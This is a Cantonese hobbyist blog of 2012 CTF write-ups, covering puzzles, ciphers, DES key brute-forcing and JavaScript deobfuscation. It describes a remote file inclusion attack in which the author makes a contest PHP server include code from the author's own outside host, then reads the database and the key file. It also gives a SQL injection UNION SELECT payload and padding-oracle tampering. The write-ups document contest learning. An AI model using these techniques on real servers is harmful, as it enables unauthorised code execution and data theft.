2012年8月21日 星期二

ICX1 製作花絮: R4





相信大家都估到之後會係點。唔多貼啦。

2012年8月20日 星期一

ICX1 製作花絮: S5

暫時最難 (同埋煩)。


話說 Nobody 打左D字響個 text box 度,中間D "Encrypted Traffic" 俾 No one eavesdrop 左。
你(No one)就要解堆 encrypted traffic 估下 Nobody 打左乜。

*呢個野用RSA + ISO Standard session key exchange + RC4 
好似好安全(?)


暫時進度:

綠色 = Solved (即係有呢關。)

都唔知幾時先整得完。整完又冇人玩。(or 冇人識玩) 都唔知整黎做乜。

2012年6月4日 星期一

DEFCBA xx 賽後報告

又要玩又要鬧
今次真係要鬧
=====================

你叫我寫 urine100 Write-up 我心諗我點X寫
同問我 四大門神 點過一樣

AoR 第76關 Write-up:
一開見到有幅圖
入面有四隻野
網址話乜 exifforhints 咁咪求其拿個 Hex Editor 定乜開個 JPG file 啦
入面寫咩 Lord of the Rings
再睇下果四隻野 關乜X事

求其剪幅圖去 Google 搵 搵到隻雀
都唔知做乜

唯有用下旁門左道
四隻野 答案應該四個字啦
求其拿本字典搵個 List 之後撞
撞撞下 gate 就係答案 唔好問我點解


urine100 Write-up:
一開見到問 How many developers;) did it take to secure Windows 8?
冇提示 你老X

求其打去 Google 搵 搵到 Building Windows 8 - Site Home - MSDN Blogs
第三頁有個 Introducing the team
寫住 "We have about 35 feature teams in the Windows 8 organization.  Each feature team has anywhere from 25-40 developers, plus test and program management, all working together."

有 Team 叫咩 Reliability, Security, and Privacy
咁應該 25-40 啦 我慢慢試 25 至 40 錯晒
咦仲有個 Security & Identity 試埋 50 - 80 (唔好問我點計) 都係錯晒

你老X 又要用下旁門左邊
問幾多個 答案應該係非負整數啦
求其寫個 Loop 0 至 10000 撞 斷估你個 team 唔會超過一萬人掛 你篇文個 team 都係千幾人
之後啊明眼人一睇 睇到個答案係 152 唔好問我點解


練習題:唔用 Search Engine 答 埃屍S1 (提示: 答案係年份, 應該係數字)
=====================

gameboy400 問咩 What is Jeff Moss' checking account balance?
俾左個網 入面扮晒係銀行咁
有個 form 搵分行 可以玩 SQL Injection
打咩 0 UNION SELECT '1','2','3','4',5,'6' FROM somewhere 啦
(成句我諗係 SELECT * FROM "branch" WHERE zip = /* Your Input */)

咁搵下 Last name 邊個姓 Moss
有個咩 Trinity Moss 你X母丫 係唔係佢老X 黎
入去佢 Account 睇 checking 同 saving 都冇晒錢囉
答 0 佢又話錯
咁搵下有冇人叫 Jeff 啦 冇喎
一係搵下邊個戶口有錢啦 WHERE 果度加 Balance > 0
一個 Record 都冇啊 係一個都冇啊
呢間乜X銀行黎架 ON NINE NINE 咁 執X左佢啦

之後我見隔離啊大佬打 0.0 話 WRONG
我記得 User 界面入面個 Balance 唔係 0.0
之後入去睇 Balance 係 0.00
打 0.00 話 CORRECT 囉
硬膠膠咁 你老X咁都值 400 分
你老X 頭先我打 0 又話 WRONG
WRONG 你個死人頭咩


同類型硬膠題目有 AoR 乜春邀請賽 唔知第幾集
最尾果題咩 Notepad.Txt 定乜
佢老X 平時 Online Ribble 全部答細楷 今次佢真係要答咩 Txt 定乜 答 txt 又話錯
錯你個死人頭咩

今次呢個冇練習題。 埃屍應該冇呢類硬膠題目 (好似係)
有既話話返俾我知。
=====================

最後 gameboy100 無聊題
題目係 Hack the planet_

我打 Hack the planet! 佢彈 WRONG
我再打 ! 佢個 WRONG 仲響度
我之後又試下 ? 啊 . 啊 Hack the planet? 啊 Hack the planet. 啊又錯
搞搞下唔知過幾耐我再打多次 ! 又話 CORRECT
你老X 正X街 唔知做乜春 我懷疑我答太快佢又唔出個 SLOW DOWN 俾我睇 搞到我以為錯

練習題:乜呢個都有練習題
=====================

等人出其他答案 果題 urine200 真係正X街 戇狗狗咁
又話咩 Break the cipher 我仲以為係 Crypto 野 等我仲幾開心
入到去一個爛網 咩阿蓋達官方網站 一堆爛鬼 JSON Library 抄人地
個咩 gallery.php 又開唔到 咩 fastbutton.html 開佢有個 Hugo 又話錯 錯你個死人頭咩

 錯你個死人頭咩 錯你個死人頭咩錯你個死人頭咩 

2012年5月4日 星期五

3P2012CTF

又黎 又要玩又要鬧
今次呢隻野扮晒 RPG 咁
結果最後都要屈服出返個 simple 介面。


今次好似好D答到四題。不過佢今次都幾多題目。

第一題
Addition is Hard
15
Puzzles
Addition is hard!
0x0 +0x7068703f = ?
Answer in decimal

今次一睇就知又翻炒 2011 果d Trivia 題。 上次果堆 "Past Paper": http://www.plaidctf.com/pctf2011/site_media/writeups/pCTF2011_Writeup_HFS.txt
你老味都唔係俾人睇既
咁一問 Google 1.3337 ~= XXXXXXX/3145727 就出 Pentium FDIV bug
今次實係加數 Bug 啦 咁又問下 Google 乜都冇。 (依家梗係有)

咁呢明眼人一睇就知 7068703f 就係 php? (好似係)
咁就問 Google php hex addition bug 出左下面果頁
https://bugs.php.net/bug.php?id=61095

原來加號黐住個數會變左乘二 都黐黐地線
答案: 3771785342


第二題

RoboDate
100
Password Guessing
So apparently robots, despite their lack of hormones, still have an underlying desire to mate. We stumbled upon a robot dating site, RoboDate. Hack it for us!

呢個無聊交友網可以俾人打個名同感情狀況 (果張 form 仲要隱藏左,又要開 Firebug)
Submit 出去又出返你個名同感情狀況。係咪好無聊呢
如果睇醬汁碼 會見到有個好抵死既 debug message



寫到咁白。咁呢個 query string 有一大抽 hex string,係咁意試下改其中一個 會搞到個 user_data d內容唔同左。拿 又翻炒 Padding Oracle。 上年炒到 2012 年中都仲 Padding Oracle。
嚴格黎講呢個唔算咩 Padding Oracle,因為你又唔會手痕改個 Padding 果d bytes,一改佢又彈句 Go away. 就算。 同埋個 Oracle 就唔係話聽日落唔落雨,係話聽日六合彩第一個字開幾號,改第二個就話第二個字開幾號。你玩晒啦。根本就算你唔知咩 IV XOR M' = M 呢d formula 你都可以慢慢試試到最後砌到個 |admin 出黎。

答案: 2012-04-25_14:46:24.29582+05:27@2012%127.0.0.2_IS_BEST_KEY



第三題

Paste
100
Practical Packets
Robot hackers, like their human counter parts, have a largely unmet need to dump large amounts of text to their peers. We recently got access to one of their servers and are providing you with the files. What have they been talking about?

今次俾埋 source code 你睇喎。 原來係 php 。README 寫住咩 PLEASE TURN allow_url_include ON。咁輪危險都開,肯定呢度出事啦。跟住搵搵下搵到 display_paste.php 有個乜春如果頭兩個字係 ^^ 就 require(substr($description, 2). ".txt"); 囉。咁你去 make_followup.php 果度又話你要有咩 admin cookie 先可以 post 個 description 有 ^^ 。咁呢唔知做乜我冇個 admin cookie 都照 post 到 ^^。 咁就順利 post 左個怪獸上去啦 ^^。 打呢段野打到我一堆 ^^。咁放左個 description 做我個網某個 file 之後咁我就可以任改任 run code 啦。第一時間諗掘個 mysql database。 點知乜都冇 (其實有一大堆其他參賽者既 post)。例子:


Array
(
    [0] => 4f9d6643584e0
    [id] => 4f9d6643584e0
    [1] => test
    [text] => test
    [2] => abap
    [language] => abap
    [3] => 4f9d6378af542
    [parent] => 4f9d6378af542
    [4] => ^^http://debugducky.com/test
    [description] => ^^http://debugducky.com/test
)

拿我仲上到佢個野架:
http://debugducky.com/test.txt



你見佢仲響到掘 information_schema 。
見唔到對就用下 dir 。點知有個野叫 key.php。你老味。
咁fread 佢就有答案。


答案: s0m3_php_d3v5_actua11y_d0_th15




第四題

3D
100
Potpourri
The robots appear to be testing some kind of new camera technology but we haven't quite figured it out yet. Understanding this imaging could be crucial to our understanding the enemy and winning the war.

呢題啊陸先生 (好似唔係姓陸喎佢。唔係話你 歐花)  都有份答 好似係。
俾左幅巨型 JPG File。乜春全息攝影。但係得一幅圖仲要有張野遮住個答案。
咁其實只要用個 jpg header 同 footer (FF D8 , FF D9) explode 下佢就會爆到好多幅圖。
咁啊陸先生佢話佢用人手拆(?) 拆到最後一幅出黎睇到答案 好似係
其實幅圖矇輪到丫。要睇幾幅先睇到答案

答案: 3d_g1v35_m3_a_h3adach3



有題怪野又答唔到 明明好似好易咁 (雖然都值百五分)
睇返人地D答案 又話要用 XOR 你老味又係 XOR 吊

其實就唔寫啦。玩到咁上下 題題都變左做 Reverse Engineering 咁。好似玩埃屍玩玩下題題都 Program 咁。


最後貼題 Gag 題

Shoulder Surfing
25
Puzzles
What's a password that polaroid head got from inside Ellingson?
答案

http://www.youtube.com/watch?v=eIAQFJhuNmU&t=4m44s

明眼人一睇就知 睇下你要睇幾多次啦喎

2012年4月13日 星期五

黑到爆

Good Friday 之後變 Black Friday
泰極否來

2012年2月26日 星期日

曲基2012 CTF賽後報告

玩左成日捽到兩題。

第一題 M1 明眼人一睇就知係 Substitution Cipher (好似係)
自從上年玩完 DEFCON 19 CTF 之後睇走過睇到有個 Tool 叫 Decrypto 之後
Purplehell 個爛鬼 Cryptogram Solver 從此就封塵

問題:
Az hrb eix mcc gyam mcxgixec rokaxioaqh hrb mrqpck gyam lbamgarx oatygqh Erxtoigbqigarx Gidc hrbg gasc gr koaxd erzzcc zro i jyaqc Kr hrb ocqh rx Ockubqq ro Yrg man?
Gyc ixmjco am dccqihrbgm
將句野掉去 Decrypto 一解就解到 (好似係)

解:
If you can see this sentance ordinarily you solved this ~uistion rightly Congratulation Take yout time to drink coffee for a while Do you rely on Red~ull or Hot si~? The answer is keelayouts

個 tilde 係指「未知字元」, 我估係 q 。
答案: keelayouts


另一題 M4 俾個左個網站 backup 既 zip,入面有段奇怪 javascript 響個 js file:
eval(function(p,a,c,k,e,d){e=function(c){return c};if(!''.replace(/^/,String)){while(c--){d[c]=k[c]||c}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('12 7=["\\10\\8\\26\\21\\16\\25\\8","","\\21\\8\\20\\14\\22\\24","\\23\\27\\30\\23\\22\\10\\29\\20\\14","\\31\\10\\17\\28\\18\\24\\16\\10\\18\\17\\35\\8"];32 37(5){5=5[7[0]](/ /15,1);5=5[7[0]](/\\38/15,0);12 13=5;5=7[1];19(6=0;6<13[7[2]];6++){5=13[7[3]](6,6+1)+5};12 11=7[1];19(6=0;6<5[7[2]];6+=9){11+=36[7[4]](33(5[7[3]](6,6+9),2))};34(11)};',10,39,'|||||_0x272dx2|i|_0xfd3a|x65||x72|_0x272dx4|var|_0x272dx3|x67|g|x61|x6F|x43|for|x6E|x6C|x74|x73|x68|x63|x70|x75|x6D|x69|x62|x66|function|parseInt|eval|x64|String|c|t'.split('|'),0,{}))

又 eval p,a,c,k,e,d
之前搵到個幾好既方法 unpack 個 eval:

oldEval=eval;
function eval(a){
document.write(a + '<hr />');
oldEval(a);
}

解一次出:
var _0xfd3a=["\x72\x65\x70\x6C\x61\x63\x65","","\x6C\x65\x6E\x67\x74\x68","\x73\x75\x62\x73\x74\x72\x69\x6E\x67","\x66\x72\x6F\x6D\x43\x68\x61\x72\x43\x6F\x64\x65"];function c(_0x272dx2){_0x272dx2=_0x272dx2[_0xfd3a[0]](/ /g,1);_0x272dx2=_0x272dx2[_0xfd3a[0]](/\t/g,0);var _0x272dx3=_0x272dx2;_0x272dx2=_0xfd3a[1];for(i=0;i<_0x272dx3[_0xfd3a[2]];i++){_0x272dx2=_0x272dx3[_0xfd3a[3]](i,i+1)+_0x272dx2};var _0x272dx4=_0xfd3a[1];for(i=0;i<_0x272dx2[_0xfd3a[2]];i+=9){_0x272dx4+=String[_0xfd3a[4]](parseInt(_0x272dx2[_0xfd3a[3]](i,i+9),2))};eval(_0x272dx4)};

又有 eval 喎,試下再解多次啦,冇野出。咁即係個 eval 冇 call 到,極有可能係響個 function 入面。
咁我又試下 list out global property:

for (i in window){
document.write('Property = ' + i + '
Value = ' + window[i] + '<hr />')
}

(你見我上面用 a 下面用 i 都知兩段野應該係唔知邊度抄返黎。)
解:
Property = _0xfd3a
Value = replace,,length,substring,fromCharCode
Property = c
Value = function c(_0x272dx2){_0x272dx2=_0x272dx2[_0xfd3a[0]](/ /g,1);_0x272dx2=_0x272dx2[_0xfd3a[0]](/\t/g,0);var _0x272dx3=_0x272dx2;_0x272dx2=_0xfd3a[1];for(i=0;i<_0x272dx3[_0xfd3a[2]];i++){_0x272dx2=_0x272dx3[_0xfd3a[3]](i,i+1)+_0x272dx2};var _0x272dx4=_0xfd3a[1];for(i=0;i<_0x272dx2[_0xfd3a[2]];i+=9){_0x272dx4+=String[_0xfd3a[4]](parseInt(_0x272dx2[_0xfd3a[3]](i,i+9),2))};eval(_0x272dx4)}

原來有個 function c。如果你執靚佢會見到將個咩 _0x272dx2 replace(/ /g,0) 同埋 replace(/\t/g,0) 之後又唔知 substring 乜春。我估個 c 個 input 係一大堆 space 同 tab,好似果題俾人_到飛起既埃屍 R29
之後我就諗點撞個 input parameter,後來有位朋友搵到個網有一度 call 個 function c。之後我抄左果段野,個input parameter 真係一大堆 space 同 tab。整果條友真係好得閒。

果段野(我估個 blog 實食晒我堆 space 同 tab):
c(' ');

之後將呢段野加埋頭先unpack左一次果段放埋一齊,然後又用 個 eval unpack 解多下:
if(new Date().getTime()>1330268400000){ var dummya = '1'; var dummyb = '1'; var dummyv = '1'; var dummyc = '1'; var dummys = '1'; var dummyae = '1'; var dummyasefa = '1'; var dummeya = '1'; var dummya = '1'; var dum3mya = '1'; var dumm54ya = '1'; var dumm3ya = '1'; var dum1mya = '1'; var p = 'YTK4YPT1YK48PTK48TK34PTYK6TDKT5P2KT73TKPY4TBTK3TT4YKT4ETK4YTP7K4T6KT30TKYP7T2KYT33TKP7TY6KTYP33TKPY7PT2YT'; p = p.replace(/T/g,'').replace(/P/g,'').replace(/Y/g,'').replace(/K/g,'%'); var authkey = unescape(p); }


var authkey = unescape(p) 囉。
仲要有個無聊 if,check 下你電腦個時間過左比賽 deadline 未。
係咁以刪左個 if 之後 alert 或者 document.write 返個 authkey,出:
AHH4mRsK4NGF0r3v3r

呢題竟然值300分。 果堆100分題 (除M1) 難到痴晒線,但係答唔到100分又唔俾答「更難(好似係)」既題目,真係吹脹。



今朝起身見到題 M5 俾人答左。 我Download晒d題目之後開黎玩下
Let's view the problem from another angle.
Decrypt it.
RDCVGF_YGBNJU_TGBNM_YGBNJU_TGBNM_TGBNM_YGBNJU_TGBNM

咁多重覆。 我放去個 substitution cipher program 玩下結果出 0 result found。 即係唔係英文生字啦。
之後諗返 D 無聊 Ribble 題種。其中一個係用個 Keyword 畫返個字。畫下又真係畫到D野
GOLOLLOL
答下話我錯喎。
再諗下D 其他無聊 Ribble 題種。其中一種係計數機調轉放。我見個 G 又好似 6 咁又試下調轉放: 70770709
又錯囉

剩返果2分鐘都廢鬼事試 等走過
後來問返人原來係 G_O_L_O_L_L_O_L
真係 ck, ck, ck 。(* 唔係粗口)



Online ribble 最忌題目爛,我地又回顧下經典既四大門神 爛題目:

當年要 Brute force 個答案。點解叫四大門神自己諗下,同個答案有關。

今次個曲基又好似有 D 要 Brute force 喎,好似 M2 M3 咁。撞到下年佛誕都未撞完

M2:
Alice wants to send a message to Bob in secure way.
Alice encrypted a plaintext PA = ※IMISSYOU§ = 0x494D495353594F55 by using DES and obtained ciphertext CA = 0xFA26ED1833264435.
Alice sent the ciphertext CA and the secret key to Bob. The secret key was encrypted by converting each of its letters to a pair of digits giving its position in the typewriter keyboard. More precisely, the following table is used.

1 2 3 4 5 6 7 8 9 0
1 Q W E R T Y U I O P
2 A S D F G H J K L
3 Z X C V B N M

In this manner, 'A' is converted to 21, 'B' to 35, etc. In transmission, all of the first digits were lost and the received secret key resulted in the pairs:
?8 ?9 ?9 ?4 ?3 ?5 ?9 ?5

After a few minutes, Bob recovered the secret key and smiled. Bob decided to reply in the same way.
Bob encrypts a plaintext PB = 0xB6B2B6ACACA6B0AA by using DES and obtained ciphertext CB = 0x05D912E7CCD9BBCA.
What is the secret key which Bob used? (0x????????????????) (Bob*s secret key is different from Alice*s secret key)

Answer: strupr(????????????????)

解左一陣解到條 Key 係 ILOVEBOB,亦都 verify 左。
之後條題目寫住 "Bob decided to reply in the same way." 即係會 send 返個 cipher text 同埋 encrypted key 俾 Alice 啦。
咁個 key 既 domain 係 8個大楷英文字母,要撞 26^8,OMG
經我研究之後發現 DES 係用 56 bits key (真係天大既秘密。),你入個 64 bits 既 key 佢會幫你 trim 下,原來條 key BBBBBBBB 同 CCCCCCCC 係一樣。結論係有14組字母:
A, B=C, D=E, F=G, ... V=W, X=Y, Z
都要撞 14^8,真係開心。冇超級電腦 / Server farm 撞唔到啦,唔通要去買 cloud 咩。
咁撞法撞到天光都未撞到。天光都比賽完啦。結果求其拿d 字典字去撞算,因為我估 Bob 會 send 返咩 ILOVEYOU 果類野。最後梗係撞唔到。

睇走過睇到 P_A XOR P_B = 0xFF, C_A XOR C_B = 0xFF 所以 K_A XOR K_B = 0xFF
真係睇到我媽叉聲。又話會 send 返條 encrypted key,即係出錯題啦。
如果啊 V先生發現到 P_A 同 P_B 個 pattern 一樣就好。我地仲以為 P_B 係D表情符號定韓文。

不過點都好,有得玩好過冇得玩。我都明白出題目係好難。
所以呢種情況成日發生:http://ozetta.net/aor/pon.html
A先生: will have.

。- 完 -


練習題:用 eval unpack 解埃屍 R35 果條 a[6]。包你解到媽叉聲。